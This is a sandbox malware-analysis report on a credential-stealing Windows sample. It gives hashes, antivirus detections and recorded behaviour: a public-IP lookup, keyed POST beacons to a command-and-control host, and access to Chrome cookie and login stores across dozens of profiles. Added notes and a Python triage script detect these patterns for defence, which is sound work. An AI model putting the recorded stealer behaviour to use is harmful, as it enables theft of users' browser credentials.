Summary | ZeroBOX

customer6.exe

Tags UPX, ASPack, Malicious Library, PE64, PE File, OS Processor Check
Category FILE
Machine s1_win7_x6402
Started Oct. 18, 2021, 9:27 a.m.
Completed Oct. 18, 2021, 9:31 a.m.
Size 1.4MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 807f55cee679ba76724aee80756a0c4f
SHA256 d788b085cc98c274abd24c4ac8d00f870297dc4f5b68684af8a5c328cc50beb4
CRC32 44A360D7
ssdeep 24576:ur0Y0b3wTBY0zc3OHmIOss9/DQTBlFadP6WNltPSQv:ub6gT20iOHmIPWDQll86Ytfv
PDB Path D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb
Yara
  • ASPack_Zero - ASPack packed file
  • IsPE64 - (no description)
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
Note: UPX_Zero and ASPack_Zero are string-based packer rules. One file matching both while still carrying its Release-build PDB path is more consistent with rule false positives than with double packing, so confirm packing from section names and entropy before relying on these tags.

IP Address Status
164.124.101.2 Active
208.95.112.1 Active
45.136.151.102 Active

Suricata Alerts

Flow TCP 192.168.56.102:49163 -> 208.95.112.1:80
SID 2022082
Signature ET POLICY External IP Lookup ip-api.com
Category Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

pdb_path D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb
API GlobalMemoryStatusEx
Arguments (none)
Status 1
Return 1
Repeated 0
GlobalMemoryStatusEx on its own is benign (it reports physical and virtual memory totals); read together with the OS_Processor_Check tag above it is consistent with environment fingerprinting, where a low RAM figure is used to recognise a sandbox VM.
section _RDATA
resource name TXT
suspicious_features POST method with no referer header
suspicious_request POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2
request GET http://ip-api.com/json/
request GET http://staticimg.youtuuee.com/api/fbtime
request POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2
request POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 56\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 49\Cookies
domain ip-api.com
API GetAdaptersAddresses
Arguments flags: 15, family: 0
Return 111
Repeated 0
The extracted row reads "111 0", i.e. return 111, repeated 0. flags 15 is GAA_FLAG_SKIP_UNICAST | GAA_FLAG_SKIP_ANYCAST | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_DNS_SERVER (0x1 | 0x2 | 0x4 | 0x8) and family 0 is AF_UNSPEC: the per-adapter address lists are skipped, leaving adapter identity (friendly name, description, physical/MAC address), which is what host-fingerprinting and machine-ID routines usually want. Return 111 is ERROR_BUFFER_OVERFLOW, the documented first call that only sizes the output buffer; the actual enumeration is the follow-up call with a large enough buffer.
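The request, file and domain marks above describe three behaviours: a public-IP lookup, a keyed POST beacon to staticimg.youtuuee.com, and opens of Chrome cookie and login stores across dozens of profile directories (a sandbox VM is unlikely to hold ~100 Chrome profiles, so the file list most plausibly records open attempts against probed profile names rather than existing data). The following is an added triage helper, not part of the ZeroBOX report or the sample's code. It turns sandbox-style indicator lines into those three findings and a verdict. The sample input is constructed to mirror the marks in this report; the IP-lookup host list, the "sid"+"key" beacon heuristic and the verdict thresholds are assumptions of this example, not ZeroBOX or vendor logic.

```python
"""Triage of sandbox indicator lines (request / file / domain marks).

Added example, not part of the ZeroBOX report or the sample. SAMPLE_LINES is a
constructed subset of this report's marks plus one benign file; IP_LOOKUP_HOSTS,
the sid+key beacon heuristic and the verdict thresholds are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed input mirroring the indicator lines in this report.
SAMPLE_LINES = r"""
request GET http://ip-api.com/json/
request GET http://staticimg.youtuuee.com/api/fbtime
request POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2
request POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Temp\unrelated.tmp
domain ip-api.com
""".strip().splitlines()

# Public "what is my IP" services commonly queried by malware for victim
# geolocation (assumed list; extend it from your own telemetry).
IP_LOOKUP_HOSTS = {"ip-api.com", "api.ipify.org", "ifconfig.me", "icanhazip.com"}

# Chromium credential/cookie stores under any profile directory. "-journal" is the
# SQLite rollback journal that appears when a store is opened for writing.
CHROME_STORE_RE = re.compile(
    r"\\Google\\Chrome\\User Data\\(?P<profile>Default|Profile \d+)"
    r"\\(?P<store>Cookies|Login Data|Web Data)(?:-journal)?$",
    re.IGNORECASE,
)


def triage(lines):
    """Group indicator lines into the three behaviours shown in this report."""
    result = {
        "external_ip_lookup": [],                 # hosts queried for the public IP
        "post_beacon": defaultdict(int),          # endpoint -> number of POSTs
        "chrome_store_access": defaultdict(set),  # store -> profiles touched
    }
    for raw in lines:
        kind, _, rest = raw.strip().partition(" ")
        if kind == "request":
            method, _, url = rest.partition(" ")
            u = urlparse(url)
            if u.hostname in IP_LOOKUP_HOSTS:
                result["external_ip_lookup"].append(u.hostname)
            # A POST whose query string carries a campaign id and a static key is
            # the beacon shape seen in this report (heuristic, assumed here).
            if method.upper() == "POST" and {"sid", "key"}.issubset(parse_qs(u.query)):
                result["post_beacon"][f"{u.hostname}{u.path}"] += 1
        elif kind == "file":
            m = CHROME_STORE_RE.search(rest)
            if m:
                result["chrome_store_access"][m.group("store")].add(m.group("profile"))
    # Freeze the counters so callers get plain dicts and ints.
    result["post_beacon"] = dict(result["post_beacon"])
    result["chrome_store_access"] = {
        store: len(profiles) for store, profiles in result["chrome_store_access"].items()
    }
    return result


def verdict(result):
    """Label the combination of findings; thresholds are this example's assumptions."""
    stores = result["chrome_store_access"]
    reasons = []
    if stores.get("Login Data", 0) or sum(stores.values()) >= 2:
        reasons.append("browser credential/cookie store access")
    if result["post_beacon"]:
        reasons.append("keyed POST beacon to non-browser endpoint")
    if result["external_ip_lookup"]:
        reasons.append("victim geolocation via public IP lookup")
    label = "infostealer-like" if len(reasons) >= 2 else "inconclusive"
    return label, reasons


if __name__ == "__main__":
    findings = triage(SAMPLE_LINES)
    print(findings)
    print(verdict(findings))
```

The profile count per store, rather than the raw number of file lines, is what separates a stealer sweeping every profile directory from a legitimate process touching its own profile once; the "-journal" suffix is folded into its parent store for the same reason.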
Bkav W32.QuiccellK.Trojan
Lionic Trojan.Win32.Fabookie.trRO
MicroWorld-eScan Gen:Variant.Mikey.127483
FireEye Gen:Variant.Mikey.127483
CAT-QuickHeal TrojanPWS.Agent
McAfee GenericRXAA-AA!807F55CEE679
Malwarebytes Spyware.PasswordStealer
Zillya Trojan.Agent.Win32.2475875
Sangfor Trojan.Win32.Agent.gen
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Backdoor:Win64/TurtleLoader.d2e77d82
K7GW Trojan ( 0058895b1 )
K7AntiVirus Trojan ( 0058895b1 )
ESET-NOD32 a variant of Win64/Agent.ATS
TrendMicro-HouseCall TROJ_GEN.R002C0DJE21
ClamAV Win.Malware.Spyagent-9830839-0
Kaspersky HEUR:Trojan-PSW.Win32.Agent.gen
BitDefender Gen:Variant.Mikey.127483
APEX Malicious
Tencent Malware.Win32.Gencirc.10cf5e9a
Ad-Aware Gen:Variant.Mikey.127483
TACHYON Trojan-PWS/W64.Agent.1422336
Emsisoft Trojan.Agent (A)
DrWeb Trojan.PWS.Siggen3.3669
McAfee-GW-Edition Artemis!Trojan
Sophos Mal/Generic-S
Ikarus Trojan.Win64.Agent
Jiangmin Trojan.PSW.Agent.cqm
Avira TR/Agent.owtog
Antiy-AVL Trojan/Generic.ASMalwS.34AA7AC
Kingsoft Win32.PSWTroj.Undef.(kcloud)
Gridinsoft Trojan.Win64.Agent.oa!s1
Microsoft Backdoor:Win64/TurtleLoader.S
GData Gen:Variant.Mikey.127483
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.R444062
VBA32 TrojanPSW.Agent
ALYac Gen:Variant.Mikey.127483
MAX malware (ai score=100)
Cylance Unsafe
Avast Win64:PWSX-gen [Trj]
Rising Stealer.FBAdsCard!1.D97B (CLASSIC)
Yandex Trojan.Agent!ztmnNuryMyE
MaxSecure Trojan.Malware.12570143.susgen
Fortinet W64/Agent.ATS!tr
AVG Win64:PWSX-gen [Trj]
Panda Trj/CI.A